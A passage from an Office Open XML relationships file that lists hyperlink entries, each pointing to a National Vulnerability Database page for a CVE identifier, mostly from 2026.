Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68770" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68771" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68929" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69356" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69657" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70403" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71864" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71865" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71866" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71867" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71868" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71869" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71871" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71960" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72716" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72717" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72839" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73080" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73090" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73251" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73532" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73533" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73665" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75827" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75828" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75832" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75835" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75837" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75854" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75940" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76200" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76201" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77089" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77413" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77414" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77415" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77642" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77644" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77776" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78012" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78082" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78997" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79782" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80238" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80428" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81800" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82526" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82854" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82859" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82876" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8323" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84479" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84480" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84695" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84696" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85146" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85148" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85154" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85183" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85391" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85424" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85425" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85426" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85428" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85433" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85434" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85435" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85437" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85438" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85440" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85595" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85602" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85663" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85667" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85672" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85695" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85696" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86121" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86184" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86189" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86190" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86296" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86543" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86738" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87929" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88069" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88860" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88864" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88866" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88867" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88868" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88869" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88877" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88899" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89042" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89249" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89253" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89254" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89255" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89256" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89258" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89259" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13737" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13745" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21095" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21096" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39923" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42945" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46713" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47243" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47839" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53790" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59679" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63382" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63385" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65638" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66047" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67276" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67367" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67402" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67443" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69255" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70460" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70478" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72836" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73414" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75856" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77635" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77645" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82090" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84189" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84197" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85427" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85614" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85625" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85694" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86117" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86426" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87930" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88880" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88881" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88882" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88887" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89243" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9277" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9317" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-4993" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-49794" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-49796" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51679" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70146" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10059" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13221" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16272" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16503" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17057" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17207" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18412" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18753" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18754" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18924" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19646" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19874" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22590" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2332" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 